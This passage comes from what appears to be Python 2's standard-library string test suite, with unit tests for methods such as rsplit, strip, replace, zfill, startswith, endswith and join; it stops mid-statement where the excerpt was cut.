def test_rsplit(self):
self.checkequal(['this', 'is', 'the', 'rsplit', 'function'],
'this is the rsplit function', 'rsplit')
# by whitespace
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d ', 'rsplit')
self.checkequal(['a b c', 'd'], 'a b c d', 'rsplit', None, 1)
self.checkequal(['a b', 'c', 'd'], 'a b c d', 'rsplit', None, 2)
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d', 'rsplit', None, 3)
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d', 'rsplit', None, 4)
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d', 'rsplit', None,
sys.maxint-20)
self.checkequal(['a b c d'], 'a b c d', 'rsplit', None, 0)
self.checkequal(['a b c d'], 'a b c d ', 'rsplit', None, 0)
self.checkequal(['a b', 'c', 'd'], 'a b c d', 'rsplit', None, 2)
self.checkequal([], ' ', 'rsplit')
self.checkequal(['a'], ' a ', 'rsplit')
self.checkequal(['a', 'b'], ' a b ', 'rsplit')
self.checkequal([' a', 'b'], ' a b ', 'rsplit', None, 1)
self.checkequal([' a b','c'], ' a b c ', 'rsplit',
None, 1)
self.checkequal([' a', 'b', 'c'], ' a b c ', 'rsplit',
None, 2)
self.checkequal(['a', 'b'], '\n\ta \t\r b \v ', 'rsplit', None, 88)
aaa = ' a '*20
self.checkequal(['a']*20, aaa, 'rsplit')
self.checkequal([aaa[:-4]] + ['a'], aaa, 'rsplit', None, 1)
self.checkequal([' a a'] + ['a']*18, aaa, 'rsplit', None, 18)
# by a char
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'rsplit', '|')
self.checkequal(['a|b|c', 'd'], 'a|b|c|d', 'rsplit', '|', 1)
self.checkequal(['a|b', 'c', 'd'], 'a|b|c|d', 'rsplit', '|', 2)
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'rsplit', '|', 3)
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'rsplit', '|', 4)
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'rsplit', '|',
sys.maxint-100)
self.checkequal(['a|b|c|d'], 'a|b|c|d', 'rsplit', '|', 0)
self.checkequal(['a||b||c', '', 'd'], 'a||b||c||d', 'rsplit', '|', 2)
self.checkequal(['', ' begincase'], '| begincase', 'rsplit', '|')
self.checkequal(['endcase ', ''], 'endcase |', 'rsplit', '|')
self.checkequal(['', 'bothcase', ''], '|bothcase|', 'rsplit', '|')
self.checkequal(['a\x00\x00b', 'c', 'd'], 'a\x00\x00b\x00c\x00d', 'rsplit', '\x00', 2)
self.checkequal(['a']*20, ('a|'*20)[:-1], 'rsplit', '|')
self.checkequal(['a|a|a|a|a']+['a']*15,
('a|'*20)[:-1], 'rsplit', '|', 15)
# by string
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'rsplit', '//')
self.checkequal(['a//b//c', 'd'], 'a//b//c//d', 'rsplit', '//', 1)
self.checkequal(['a//b', 'c', 'd'], 'a//b//c//d', 'rsplit', '//', 2)
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'rsplit', '//', 3)
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'rsplit', '//', 4)
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'rsplit', '//',
sys.maxint-5)
self.checkequal(['a//b//c//d'], 'a//b//c//d', 'rsplit', '//', 0)
self.checkequal(['a////b////c', '', 'd'], 'a////b////c////d', 'rsplit', '//', 2)
self.checkequal(['', ' begincase'], 'test begincase', 'rsplit', 'test')
self.checkequal(['endcase ', ''], 'endcase test', 'rsplit', 'test')
self.checkequal(['', ' bothcase ', ''], 'test bothcase test',
'rsplit', 'test')
self.checkequal(['ab', 'c'], 'abbbc', 'rsplit', 'bb')
self.checkequal(['', ''], 'aaa', 'rsplit', 'aaa')
self.checkequal(['aaa'], 'aaa', 'rsplit', 'aaa', 0)
self.checkequal(['ab', 'ab'], 'abbaab', 'rsplit', 'ba')
self.checkequal(['aaaa'], 'aaaa', 'rsplit', 'aab')
self.checkequal([''], '', 'rsplit', 'aaa')
self.checkequal(['aa'], 'aa', 'rsplit', 'aaa')
self.checkequal(['bbob', 'A'], 'bbobbbobbA', 'rsplit', 'bbobb')
self.checkequal(['', 'B', 'A'], 'bbobbBbbobbA', 'rsplit', 'bbobb')
self.checkequal(['a']*20, ('aBLAH'*20)[:-4], 'rsplit', 'BLAH')
self.checkequal(['a']*20, ('aBLAH'*20)[:-4], 'rsplit', 'BLAH', 19)
self.checkequal(['aBLAHa'] + ['a']*18, ('aBLAH'*20)[:-4],
'rsplit', 'BLAH', 18)
# mixed use of str and unicode
self.checkequal([u'a b', u'c', u'd'], 'a b c d', 'rsplit', u' ', 2)
# argument type
self.checkraises(TypeError, 'hello', 'rsplit', 42, 42, 42)
# null case
self.checkraises(ValueError, 'hello', 'rsplit', '')
self.checkraises(ValueError, 'hello', 'rsplit', '', 0)
def test_strip(self):
self.checkequal('hello', ' hello ', 'strip')
self.checkequal('hello ', ' hello ', 'lstrip')
self.checkequal(' hello', ' hello ', 'rstrip')
self.checkequal('hello', 'hello', 'strip')
# strip/lstrip/rstrip with None arg
self.checkequal('hello', ' hello ', 'strip', None)
self.checkequal('hello ', ' hello ', 'lstrip', None)
self.checkequal(' hello', ' hello ', 'rstrip', None)
self.checkequal('hello', 'hello', 'strip', None)
# strip/lstrip/rstrip with str arg
self.checkequal('hello', 'xyzzyhelloxyzzy', 'strip', 'xyz')
self.checkequal('helloxyzzy', 'xyzzyhelloxyzzy', 'lstrip', 'xyz')
self.checkequal('xyzzyhello', 'xyzzyhelloxyzzy', 'rstrip', 'xyz')
self.checkequal('hello', 'hello', 'strip', 'xyz')
# strip/lstrip/rstrip with unicode arg
if test_support.have_unicode:
self.checkequal(unicode('hello', 'ascii'), 'xyzzyhelloxyzzy',
'strip', unicode('xyz', 'ascii'))
self.checkequal(unicode('helloxyzzy', 'ascii'), 'xyzzyhelloxyzzy',
'lstrip', unicode('xyz', 'ascii'))
self.checkequal(unicode('xyzzyhello', 'ascii'), 'xyzzyhelloxyzzy',
'rstrip', unicode('xyz', 'ascii'))
# XXX
#self.checkequal(unicode('hello', 'ascii'), 'hello',
# 'strip', unicode('xyz', 'ascii'))
self.checkraises(TypeError, 'hello', 'strip', 42, 42)
self.checkraises(TypeError, 'hello', 'lstrip', 42, 42)
self.checkraises(TypeError, 'hello', 'rstrip', 42, 42)
def test_ljust(self):
self.checkequal('abc ', 'abc', 'ljust', 10)
self.checkequal('abc ', 'abc', 'ljust', 6)
self.checkequal('abc', 'abc', 'ljust', 3)
self.checkequal('abc', 'abc', 'ljust', 2)
self.checkequal('abc*******', 'abc', 'ljust', 10, '*')
self.checkraises(TypeError, 'abc', 'ljust')
def test_rjust(self):
self.checkequal(' abc', 'abc', 'rjust', 10)
self.checkequal(' abc', 'abc', 'rjust', 6)
self.checkequal('abc', 'abc', 'rjust', 3)
self.checkequal('abc', 'abc', 'rjust', 2)
self.checkequal('*******abc', 'abc', 'rjust', 10, '*')
self.checkraises(TypeError, 'abc', 'rjust')
def test_center(self):
self.checkequal(' abc ', 'abc', 'center', 10)
self.checkequal(' abc ', 'abc', 'center', 6)
self.checkequal('abc', 'abc', 'center', 3)
self.checkequal('abc', 'abc', 'center', 2)
self.checkequal('***abc****', 'abc', 'center', 10, '*')
self.checkraises(TypeError, 'abc', 'center')
def test_swapcase(self):
self.checkequal('hEllO CoMPuTErS', 'HeLLo cOmpUteRs', 'swapcase')
self.checkraises(TypeError, 'hello', 'swapcase', 42)
def test_replace(self):
EQ = self.checkequal
# Operations on the empty string
EQ("", "", "replace", "", "")
EQ("A", "", "replace", "", "A")
EQ("", "", "replace", "A", "")
EQ("", "", "replace", "A", "A")
EQ("", "", "replace", "", "", 100)
EQ("", "", "replace", "", "", sys.maxint)
# interleave (from=="", 'to' gets inserted everywhere)
EQ("A", "A", "replace", "", "")
EQ("*A*", "A", "replace", "", "*")
EQ("*1A*1", "A", "replace", "", "*1")
EQ("*-#A*-#", "A", "replace", "", "*-#")
EQ("*-A*-A*-", "AA", "replace", "", "*-")
EQ("*-A*-A*-", "AA", "replace", "", "*-", -1)
EQ("*-A*-A*-", "AA", "replace", "", "*-", sys.maxint)
EQ("*-A*-A*-", "AA", "replace", "", "*-", 4)
EQ("*-A*-A*-", "AA", "replace", "", "*-", 3)
EQ("*-A*-A", "AA", "replace", "", "*-", 2)
EQ("*-AA", "AA", "replace", "", "*-", 1)
EQ("AA", "AA", "replace", "", "*-", 0)
# single character deletion (from=="A", to=="")
EQ("", "A", "replace", "A", "")
EQ("", "AAA", "replace", "A", "")
EQ("", "AAA", "replace", "A", "", -1)
EQ("", "AAA", "replace", "A", "", sys.maxint)
EQ("", "AAA", "replace", "A", "", 4)
EQ("", "AAA", "replace", "A", "", 3)
EQ("A", "AAA", "replace", "A", "", 2)
EQ("AA", "AAA", "replace", "A", "", 1)
EQ("AAA", "AAA", "replace", "A", "", 0)
EQ("", "AAAAAAAAAA", "replace", "A", "")
EQ("BCD", "ABACADA", "replace", "A", "")
EQ("BCD", "ABACADA", "replace", "A", "", -1)
EQ("BCD", "ABACADA", "replace", "A", "", sys.maxint)
EQ("BCD", "ABACADA", "replace", "A", "", 5)
EQ("BCD", "ABACADA", "replace", "A", "", 4)
EQ("BCDA", "ABACADA", "replace", "A", "", 3)
EQ("BCADA", "ABACADA", "replace", "A", "", 2)
EQ("BACADA", "ABACADA", "replace", "A", "", 1)
EQ("ABACADA", "ABACADA", "replace", "A", "", 0)
EQ("BCD", "ABCAD", "replace", "A", "")
EQ("BCD", "ABCADAA", "replace", "A", "")
EQ("BCD", "BCD", "replace", "A", "")
EQ("*************", "*************", "replace", "A", "")
EQ("^A^", "^"+"A"*1000+"^", "replace", "A", "", 999)
# substring deletion (from=="the", to=="")
EQ("", "the", "replace", "the", "")
EQ("ater", "theater", "replace", "the", "")
EQ("", "thethe", "replace", "the", "")
EQ("", "thethethethe", "replace", "the", "")
EQ("aaaa", "theatheatheathea", "replace", "the", "")
EQ("that", "that", "replace", "the", "")
EQ("thaet", "thaet", "replace", "the", "")
EQ("here and re", "here and there", "replace", "the", "")
EQ("here and re and re", "here and there and there",
"replace", "the", "", sys.maxint)
EQ("here and re and re", "here and there and there",
"replace", "the", "", -1)
EQ("here and re and re", "here and there and there",
"replace", "the", "", 3)
EQ("here and re and re", "here and there and there",
"replace", "the", "", 2)
EQ("here and re and there", "here and there and there",
"replace", "the", "", 1)
EQ("here and there and there", "here and there and there",
"replace", "the", "", 0)
EQ("here and re and re", "here and there and there", "replace", "the", "")
EQ("abc", "abc", "replace", "the", "")
EQ("abcdefg", "abcdefg", "replace", "the", "")
# substring deletion (from=="bob", to=="")
EQ("bob", "bbobob", "replace", "bob", "")
EQ("bobXbob", "bbobobXbbobob", "replace", "bob", "")
EQ("aaaaaaa", "aaaaaaabob", "replace", "bob", "")
EQ("aaaaaaa", "aaaaaaa", "replace", "bob", "")
# single character replace in place (len(from)==len(to)==1)
EQ("Who goes there?", "Who goes there?", "replace", "o", "o")
EQ("WhO gOes there?", "Who goes there?", "replace", "o", "O")
EQ("WhO gOes there?", "Who goes there?", "replace", "o", "O", sys.maxint)
EQ("WhO gOes there?", "Who goes there?", "replace", "o", "O", -1)
EQ("WhO gOes there?", "Who goes there?", "replace", "o", "O", 3)
EQ("WhO gOes there?", "Who goes there?", "replace", "o", "O", 2)
EQ("WhO goes there?", "Who goes there?", "replace", "o", "O", 1)
EQ("Who goes there?", "Who goes there?", "replace", "o", "O", 0)
EQ("Who goes there?", "Who goes there?", "replace", "a", "q")
EQ("who goes there?", "Who goes there?", "replace", "W", "w")
EQ("wwho goes there?ww", "WWho goes there?WW", "replace", "W", "w")
EQ("Who goes there!", "Who goes there?", "replace", "?", "!")
EQ("Who goes there!!", "Who goes there??", "replace", "?", "!")
EQ("Who goes there?", "Who goes there?", "replace", ".", "!")
# substring replace in place (len(from)==len(to) > 1)
EQ("Th** ** a t**sue", "This is a tissue", "replace", "is", "**")
EQ("Th** ** a t**sue", "This is a tissue", "replace", "is", "**", sys.maxint)
EQ("Th** ** a t**sue", "This is a tissue", "replace", "is", "**", -1)
EQ("Th** ** a t**sue", "This is a tissue", "replace", "is", "**", 4)
EQ("Th** ** a t**sue", "This is a tissue", "replace", "is", "**", 3)
EQ("Th** ** a tissue", "This is a tissue", "replace", "is", "**", 2)
EQ("Th** is a tissue", "This is a tissue", "replace", "is", "**", 1)
EQ("This is a tissue", "This is a tissue", "replace", "is", "**", 0)
EQ("cobob", "bobob", "replace", "bob", "cob")
EQ("cobobXcobocob", "bobobXbobobob", "replace", "bob", "cob")
EQ("bobob", "bobob", "replace", "bot", "bot")
# replace single character (len(from)==1, len(to)>1)
EQ("ReyKKjaviKK", "Reykjavik", "replace", "k", "KK")
EQ("ReyKKjaviKK", "Reykjavik", "replace", "k", "KK", -1)
EQ("ReyKKjaviKK", "Reykjavik", "replace", "k", "KK", sys.maxint)
EQ("ReyKKjaviKK", "Reykjavik", "replace", "k", "KK", 2)
EQ("ReyKKjavik", "Reykjavik", "replace", "k", "KK", 1)
EQ("Reykjavik", "Reykjavik", "replace", "k", "KK", 0)
EQ("A----B----C----", "A.B.C.", "replace", ".", "----")
EQ("Reykjavik", "Reykjavik", "replace", "q", "KK")
# replace substring (len(from)>1, len(to)!=len(from))
EQ("ham, ham, eggs and ham", "spam, spam, eggs and spam",
"replace", "spam", "ham")
EQ("ham, ham, eggs and ham", "spam, spam, eggs and spam",
"replace", "spam", "ham", sys.maxint)
EQ("ham, ham, eggs and ham", "spam, spam, eggs and spam",
"replace", "spam", "ham", -1)
EQ("ham, ham, eggs and ham", "spam, spam, eggs and spam",
"replace", "spam", "ham", 4)
EQ("ham, ham, eggs and ham", "spam, spam, eggs and spam",
"replace", "spam", "ham", 3)
EQ("ham, ham, eggs and spam", "spam, spam, eggs and spam",
"replace", "spam", "ham", 2)
EQ("ham, spam, eggs and spam", "spam, spam, eggs and spam",
"replace", "spam", "ham", 1)
EQ("spam, spam, eggs and spam", "spam, spam, eggs and spam",
"replace", "spam", "ham", 0)
EQ("bobob", "bobobob", "replace", "bobob", "bob")
EQ("bobobXbobob", "bobobobXbobobob", "replace", "bobob", "bob")
EQ("BOBOBOB", "BOBOBOB", "replace", "bob", "bobby")
with test_support.check_py3k_warnings():
ba = buffer('a')
bb = buffer('b')
EQ("bbc", "abc", "replace", ba, bb)
EQ("aac", "abc", "replace", bb, ba)
#
self.checkequal('one@two!three!', 'one!two!three!', 'replace', '!', '@', 1)
self.checkequal('onetwothree', 'one!two!three!', 'replace', '!', '')
self.checkequal('one@two@three!', 'one!two!three!', 'replace', '!', '@', 2)
self.checkequal('one@two@three@', 'one!two!three!', 'replace', '!', '@', 3)
self.checkequal('one@two@three@', 'one!two!three!', 'replace', '!', '@', 4)
self.checkequal('one!two!three!', 'one!two!three!', 'replace', '!', '@', 0)
self.checkequal('one@two@three@', 'one!two!three!', 'replace', '!', '@')
self.checkequal('one!two!three!', 'one!two!three!', 'replace', 'x', '@')
self.checkequal('one!two!three!', 'one!two!three!', 'replace', 'x', '@', 2)
self.checkequal('-a-b-c-', 'abc', 'replace', '', '-')
self.checkequal('-a-b-c', 'abc', 'replace', '', '-', 3)
self.checkequal('abc', 'abc', 'replace', '', '-', 0)
self.checkequal('', '', 'replace', '', '')
self.checkequal('abc', 'abc', 'replace', 'ab', '--', 0)
self.checkequal('abc', 'abc', 'replace', 'xy', '--')
# Next three for SF bug 422088: [OSF1 alpha] string.replace(); died with
# MemoryError due to empty result (platform malloc issue when requesting
# 0 bytes).
self.checkequal('', '123', 'replace', '123', '')
self.checkequal('', '123123', 'replace', '123', '')
self.checkequal('x', '123x123', 'replace', '123', '')
self.checkraises(TypeError, 'hello', 'replace')
self.checkraises(TypeError, 'hello', 'replace', 42)
self.checkraises(TypeError, 'hello', 'replace', 42, 'h')
self.checkraises(TypeError, 'hello', 'replace', 'h', 42)
def test_replace_overflow(self):
# Check for overflow checking on 32 bit machines
if sys.maxint != 2147483647 or struct.calcsize("P") > 4:
return
A2_16 = "A" * (2**16)
self.checkraises(OverflowError, A2_16, "replace", "", A2_16)
self.checkraises(OverflowError, A2_16, "replace", "A", A2_16)
self.checkraises(OverflowError, A2_16, "replace", "AA", A2_16+A2_16)
def test_zfill(self):
self.checkequal('123', '123', 'zfill', 2)
self.checkequal('123', '123', 'zfill', 3)
self.checkequal('0123', '123', 'zfill', 4)
self.checkequal('+123', '+123', 'zfill', 3)
self.checkequal('+123', '+123', 'zfill', 4)
self.checkequal('+0123', '+123', 'zfill', 5)
self.checkequal('-123', '-123', 'zfill', 3)
self.checkequal('-123', '-123', 'zfill', 4)
self.checkequal('-0123', '-123', 'zfill', 5)
self.checkequal('000', '', 'zfill', 3)
self.checkequal('34', '34', 'zfill', 1)
self.checkequal('0034', '34', 'zfill', 4)
self.checkraises(TypeError, '123', 'zfill')
# XXX alias for py3k forward compatibility
BaseTest = CommonTest
class MixinStrUnicodeUserStringTest:
# additional tests that only work for
# stringlike objects, i.e. str, unicode, UserString
# (but not the string module)
def test_islower(self):
self.checkequal(False, '', 'islower')
self.checkequal(True, 'a', 'islower')
self.checkequal(False, 'A', 'islower')
self.checkequal(False, '\n', 'islower')
self.checkequal(True, 'abc', 'islower')
self.checkequal(False, 'aBc', 'islower')
self.checkequal(True, 'abc\n', 'islower')
self.checkraises(TypeError, 'abc', 'islower', 42)
def test_isupper(self):
self.checkequal(False, '', 'isupper')
self.checkequal(False, 'a', 'isupper')
self.checkequal(True, 'A', 'isupper')
self.checkequal(False, '\n', 'isupper')
self.checkequal(True, 'ABC', 'isupper')
self.checkequal(False, 'AbC', 'isupper')
self.checkequal(True, 'ABC\n', 'isupper')
self.checkraises(TypeError, 'abc', 'isupper', 42)
def test_istitle(self):
self.checkequal(False, '', 'istitle')
self.checkequal(False, 'a', 'istitle')
self.checkequal(True, 'A', 'istitle')
self.checkequal(False, '\n', 'istitle')
self.checkequal(True, 'A Titlecased Line', 'istitle')
self.checkequal(True, 'A\nTitlecased Line', 'istitle')
self.checkequal(True, 'A Titlecased, Line', 'istitle')
self.checkequal(False, 'Not a capitalized String', 'istitle')
self.checkequal(False, 'Not\ta Titlecase String', 'istitle')
self.checkequal(False, 'Not--a Titlecase String', 'istitle')
self.checkequal(False, 'NOT', 'istitle')
self.checkraises(TypeError, 'abc', 'istitle', 42)
def test_isspace(self):
self.checkequal(False, '', 'isspace')
self.checkequal(False, 'a', 'isspace')
self.checkequal(True, ' ', 'isspace')
self.checkequal(True, '\t', 'isspace')
self.checkequal(True, '\r', 'isspace')
self.checkequal(True, '\n', 'isspace')
self.checkequal(True, ' \t\r\n', 'isspace')
self.checkequal(False, ' \t\r\na', 'isspace')
self.checkraises(TypeError, 'abc', 'isspace', 42)
def test_isalpha(self):
self.checkequal(False, '', 'isalpha')
self.checkequal(True, 'a', 'isalpha')
self.checkequal(True, 'A', 'isalpha')
self.checkequal(False, '\n', 'isalpha')
self.checkequal(True, 'abc', 'isalpha')
self.checkequal(False, 'aBc123', 'isalpha')
self.checkequal(False, 'abc\n', 'isalpha')
self.checkraises(TypeError, 'abc', 'isalpha', 42)
def test_isalnum(self):
self.checkequal(False, '', 'isalnum')
self.checkequal(True, 'a', 'isalnum')
self.checkequal(True, 'A', 'isalnum')
self.checkequal(False, '\n', 'isalnum')
self.checkequal(True, '123abc456', 'isalnum')
self.checkequal(True, 'a1b3c', 'isalnum')
self.checkequal(False, 'aBc000 ', 'isalnum')
self.checkequal(False, 'abc\n', 'isalnum')
self.checkraises(TypeError, 'abc', 'isalnum', 42)
def test_isdigit(self):
self.checkequal(False, '', 'isdigit')
self.checkequal(False, 'a', 'isdigit')
self.checkequal(True, '0', 'isdigit')
self.checkequal(True, '0123456789', 'isdigit')
self.checkequal(False, '0123456789a', 'isdigit')
self.checkraises(TypeError, 'abc', 'isdigit', 42)
def test_title(self):
self.checkequal(' Hello ', ' hello ', 'title')
self.checkequal('Hello ', 'hello ', 'title')
self.checkequal('Hello ', 'Hello ', 'title')
self.checkequal('Format This As Title String', "fOrMaT thIs aS titLe String", 'title')
self.checkequal('Format,This-As*Title;String', "fOrMaT,thIs-aS*titLe;String", 'title', )
self.checkequal('Getint', "getInt", 'title')
self.checkraises(TypeError, 'hello', 'title', 42)
def test_splitlines(self):
self.checkequal(['abc', 'def', '', 'ghi'], "abc\ndef\n\rghi", 'splitlines')
self.checkequal(['abc', 'def', '', 'ghi'], "abc\ndef\n\r\nghi", 'splitlines')
self.checkequal(['abc', 'def', 'ghi'], "abc\ndef\r\nghi", 'splitlines')
self.checkequal(['abc', 'def', 'ghi'], "abc\ndef\r\nghi\n", 'splitlines')
self.checkequal(['abc', 'def', 'ghi', ''], "abc\ndef\r\nghi\n\r", 'splitlines')
self.checkequal(['', 'abc', 'def', 'ghi', ''], "\nabc\ndef\r\nghi\n\r", 'splitlines')
self.checkequal(['\n', 'abc\n', 'def\r\n', 'ghi\n', '\r'], "\nabc\ndef\r\nghi\n\r", 'splitlines', 1)
self.checkraises(TypeError, 'abc', 'splitlines', 42, 42)
def test_startswith(self):
self.checkequal(True, 'hello', 'startswith', 'he')
self.checkequal(True, 'hello', 'startswith', 'hello')
self.checkequal(False, 'hello', 'startswith', 'hello world')
self.checkequal(True, 'hello', 'startswith', '')
self.checkequal(False, 'hello', 'startswith', 'ello')
self.checkequal(True, 'hello', 'startswith', 'ello', 1)
self.checkequal(True, 'hello', 'startswith', 'o', 4)
self.checkequal(False, 'hello', 'startswith', 'o', 5)
self.checkequal(True, 'hello', 'startswith', '', 5)
self.checkequal(False, 'hello', 'startswith', 'lo', 6)
self.checkequal(True, 'helloworld', 'startswith', 'lowo', 3)
self.checkequal(True, 'helloworld', 'startswith', 'lowo', 3, 7)
self.checkequal(False, 'helloworld', 'startswith', 'lowo', 3, 6)
# test negative indices
self.checkequal(True, 'hello', 'startswith', 'he', 0, -1)
self.checkequal(True, 'hello', 'startswith', 'he', -53, -1)
self.checkequal(False, 'hello', 'startswith', 'hello', 0, -1)
self.checkequal(False, 'hello', 'startswith', 'hello world', -1, -10)
self.checkequal(False, 'hello', 'startswith', 'ello', -5)
self.checkequal(True, 'hello', 'startswith', 'ello', -4)
self.checkequal(False, 'hello', 'startswith', 'o', -2)
self.checkequal(True, 'hello', 'startswith', 'o', -1)
self.checkequal(True, 'hello', 'startswith', '', -3, -3)
self.checkequal(False, 'hello', 'startswith', 'lo', -9)
self.checkraises(TypeError, 'hello', 'startswith')
self.checkraises(TypeError, 'hello', 'startswith', 42)
# test tuple arguments
self.checkequal(True, 'hello', 'startswith', ('he', 'ha'))
self.checkequal(False, 'hello', 'startswith', ('lo', 'llo'))
self.checkequal(True, 'hello', 'startswith', ('hellox', 'hello'))
self.checkequal(False, 'hello', 'startswith', ())
self.checkequal(True, 'helloworld', 'startswith', ('hellowo',
'rld', 'lowo'), 3)
self.checkequal(False, 'helloworld', 'startswith', ('hellowo', 'ello',
'rld'), 3)
self.checkequal(True, 'hello', 'startswith', ('lo', 'he'), 0, -1)
self.checkequal(False, 'hello', 'startswith', ('he', 'hel'), 0, 1)
self.checkequal(True, 'hello', 'startswith', ('he', 'hel'), 0, 2)
self.checkraises(TypeError, 'hello', 'startswith', (42,))
def test_endswith(self):
self.checkequal(True, 'hello', 'endswith', 'lo')
self.checkequal(False, 'hello', 'endswith', 'he')
self.checkequal(True, 'hello', 'endswith', '')
self.checkequal(False, 'hello', 'endswith', 'hello world')
self.checkequal(False, 'helloworld', 'endswith', 'worl')
self.checkequal(True, 'helloworld', 'endswith', 'worl', 3, 9)
self.checkequal(True, 'helloworld', 'endswith', 'world', 3, 12)
self.checkequal(True, 'helloworld', 'endswith', 'lowo', 1, 7)
self.checkequal(True, 'helloworld', 'endswith', 'lowo', 2, 7)
self.checkequal(True, 'helloworld', 'endswith', 'lowo', 3, 7)
self.checkequal(False, 'helloworld', 'endswith', 'lowo', 4, 7)
self.checkequal(False, 'helloworld', 'endswith', 'lowo', 3, 8)
self.checkequal(False, 'ab', 'endswith', 'ab', 0, 1)
self.checkequal(False, 'ab', 'endswith', 'ab', 0, 0)
# test negative indices
self.checkequal(True, 'hello', 'endswith', 'lo', -2)
self.checkequal(False, 'hello', 'endswith', 'he', -2)
self.checkequal(True, 'hello', 'endswith', '', -3, -3)
self.checkequal(False, 'hello', 'endswith', 'hello world', -10, -2)
self.checkequal(False, 'helloworld', 'endswith', 'worl', -6)
self.checkequal(True, 'helloworld', 'endswith', 'worl', -5, -1)
self.checkequal(True, 'helloworld', 'endswith', 'worl', -5, 9)
self.checkequal(True, 'helloworld', 'endswith', 'world', -7, 12)
self.checkequal(True, 'helloworld', 'endswith', 'lowo', -99, -3)
self.checkequal(True, 'helloworld', 'endswith', 'lowo', -8, -3)
self.checkequal(True, 'helloworld', 'endswith', 'lowo', -7, -3)
self.checkequal(False, 'helloworld', 'endswith', 'lowo', 3, -4)
self.checkequal(False, 'helloworld', 'endswith', 'lowo', -8, -2)
self.checkraises(TypeError, 'hello', 'endswith')
self.checkraises(TypeError, 'hello', 'endswith', 42)
# test tuple arguments
self.checkequal(False, 'hello', 'endswith', ('he', 'ha'))
self.checkequal(True, 'hello', 'endswith', ('lo', 'llo'))
self.checkequal(True, 'hello', 'endswith', ('hellox', 'hello'))
self.checkequal(False, 'hello', 'endswith', ())
self.checkequal(True, 'helloworld', 'endswith', ('hellowo',
'rld', 'lowo'), 3)
self.checkequal(False, 'helloworld', 'endswith', ('hellowo', 'ello',
'rld'), 3, -1)
self.checkequal(True, 'hello', 'endswith', ('hell', 'ell'), 0, -1)
self.checkequal(False, 'hello', 'endswith', ('he', 'hel'), 0, 1)
self.checkequal(True, 'hello', 'endswith', ('he', 'hell'), 0, 4)
self.checkraises(TypeError, 'hello', 'endswith', (42,))
def test___contains__(self):
self.checkequal(True, '', '__contains__', '')
self.checkequal(True, 'abc', '__contains__', '')
self.checkequal(False, 'abc', '__contains__', '\0')
self.checkequal(True, '\0abc', '__contains__', '\0')
self.checkequal(True, 'abc\0', '__contains__', '\0')
self.checkequal(True, '\0abc', '__contains__', 'a')
self.checkequal(True, 'asdf', '__contains__', 'asdf')
self.checkequal(False, 'asd', '__contains__', 'asdf')
self.checkequal(False, '', '__contains__', 'asdf')
def test_subscript(self):
self.checkequal(u'a', 'abc', '__getitem__', 0)
self.checkequal(u'c', 'abc', '__getitem__', -1)
self.checkequal(u'a', 'abc', '__getitem__', 0L)
self.checkequal(u'abc', 'abc', '__getitem__', slice(0, 3))
self.checkequal(u'abc', 'abc', '__getitem__', slice(0, 1000))
self.checkequal(u'a', 'abc', '__getitem__', slice(0, 1))
self.checkequal(u'', 'abc', '__getitem__', slice(0, 0))
self.checkraises(TypeError, 'abc', '__getitem__', 'def')
def test_slice(self):
self.checkequal('abc', 'abc', '__getslice__', 0, 1000)
self.checkequal('abc', 'abc', '__getslice__', 0, 3)
self.checkequal('ab', 'abc', '__getslice__', 0, 2)
self.checkequal('bc', 'abc', '__getslice__', 1, 3)
self.checkequal('b', 'abc', '__getslice__', 1, 2)
self.checkequal('', 'abc', '__getslice__', 2, 2)
self.checkequal('', 'abc', '__getslice__', 1000, 1000)
self.checkequal('', 'abc', '__getslice__', 2000, 1000)
self.checkequal('', 'abc', '__getslice__', 2, 1)
self.checkraises(TypeError, 'abc', '__getslice__', 'def')
def test_extended_getslice(self):
# Test extended slicing by comparing with list slicing.
s = string.ascii_letters + string.digits
indices = (0, None, 1, 3, 41, -1, -2, -37)
for start in indices:
for stop in indices:
# Skip step 0 (invalid)
for step in indices[1:]:
L = list(s)[start:stop:step]
self.checkequal(u"".join(L), s, '__getitem__',
slice(start, stop, step))
def test_mul(self):
self.checkequal('', 'abc', '__mul__', -1)
self.checkequal('', 'abc', '__mul__', 0)
self.checkequal('abc', 'abc', '__mul__', 1)
self.checkequal('abcabcabc', 'abc', '__mul__', 3)
self.checkraises(TypeError, 'abc', '__mul__')
self.checkraises(TypeError, 'abc', '__mul__', '')
# XXX: on a 64-bit system, this doesn't raise an overflow error,
# but either raises a MemoryError, or succeeds (if you have 54TiB)
#self.checkraises(OverflowError, 10000*'abc', '__mul__', 2000000000)
def test_join(self):
# join now works with any sequence type
# moved here, because the argument order is
# different in string.join (see the test in
# test.test_string.StringTest.test_join)
self.checkequal('a b c d', ' ', 'join', ['a', 'b', 'c', 'd'])
self.checkequal('abcd', '', 'join', ('a', 'b', 'c', 'd'))
self.checkequal('bd', '', 'join', ('', 'b', '', 'd'))
self.checkequal('ac', '', 'join', ('a', '', 'c', ''))
self.checkequal('w x y z', ' ', 'join', Sequence())
self.checkequal('abc', 'a', 'join', ('abc',))
self.checkequal('z', 'a', 'join', UserList(['z']))
if test_support.have_unicode:
self.checkequal(unicode('a.b.c'), unicode('.'), 'join', ['a', 'b', 'c'])
self.checkequal(unicode('a.b.c'), '.', 'join', [unicode('a'), 'b', 'c'])
self.checkequal(unicode('a.b.c'), '.', 'join', ['a', unicode('b'), 'c'])
self.checkequal(unicode('a.b.c'), '.', 'join', ['a', 'b', unicode('c')])
self.checkraises(TypeError, '.', 'join', ['a', unicode('b'), 3])
for i in [5, 25, 125]:
self.checkequal(((('a' * i) + '-') * i)[:-1], '-', 'join',
['a' * i] * i)
self.checkequal(((('a' * i) + '-') * i)[:-1], '-', 'join',
('a' * i,) * i)
self.checkraises(TypeError, ' ', 'join', BadSeq1())
self.checkequal('a b c', ' ', 'join', BadSeq2())
self.checkraises(TypeError, ' ', 'join')
self.checkraises(TypeError, ' ', 'join', 7)
self.checkraises(TypeError, ' ', 'join', Sequence([7, 'hello', 123L]))
try:
